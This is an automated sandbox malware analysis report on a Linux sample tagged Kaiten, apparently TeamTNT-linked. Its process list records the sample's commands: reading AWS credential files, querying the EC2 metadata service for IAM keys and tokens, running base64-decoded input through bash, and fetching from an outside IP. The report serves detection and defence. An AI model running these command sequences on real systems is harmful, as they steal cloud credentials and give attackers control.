Malware Analysis Report

2024-12-01 00:52

Sample ID 220121-3f6jwsdccr
Target 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae
SHA256 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae
Tags kaiten
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256

9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae

Threat Level: Known bad

The file 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae was found to be: Known bad.

Malicious Activity Summary

kaiten

Kaiten family

Identified Kaiten Bot

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-01-21 23:28

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-21 23:28

Reported

2022-01-22 00:51

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

3830s

Max time network

143s

Command Line

[./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae]

Signatures

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A
/proc/filesystems /proc/filesystems /bin/sed N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/ /tmp/ /usr/bin/chattr N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt /bin/bash N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt N/A N/A
/tmp/.stolen.from.teamtnt /tmp/.stolen.from.teamtnt /bin/rm N/A

Processes

./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae

[./9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae]

/bin/sh

[sh -c echo <base64 payload, elided> | base64 -d | bash]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/bin/cat

[cat /root/.aws/*]

/bin/cat

[cat /home/*/.aws/*]

/bin/grep

[grep AccountId]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/placement/availability-zone]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/bin/grep

[grep InstanceProfileArn]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/info]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/",//g]

/bin/sed

[sed s/"//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep AccessKeyId]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep SecretAccessKey]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/bin/grep

[grep Token]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/sbin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/wget

[wget -q --no-check-certificate -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/]

/usr/bin/awk

[awk {print $3}]

/bin/sed

[sed s/"//g]

/bin/sed

[sed s/,//g]

/usr/bin/timeout

[timeout -s SIGKILL 30 wget -q --no-check-certificate -O - 136.144.56.255]

/usr/local/sbin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/local/bin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/sbin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/bin/wget

[wget -q --no-check-certificate -O - 136.144.56.255]

/usr/bin/chattr

[chattr -ia / /tmp/]

/usr/bin/clear

[clear]

/usr/bin/base64

[base64 -w 0]

/bin/rm

[rm -f /tmp/.stolen.from.teamtnt]

/usr/bin/touch

[touch /dev/shm/.TNT.lock]

/usr/bin/chattr

[chattr +i /dev/shm/.TNT.lock]

/usr/bin/base64

[base64 -w 0]

Network

Country Destination Domain Proto
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
N/A 169.254.169.254:80 N/A tcp
US 136.144.56.255:80 N/A tcp
NL 45.9.148.85:80 N/A tcp

Files

N/A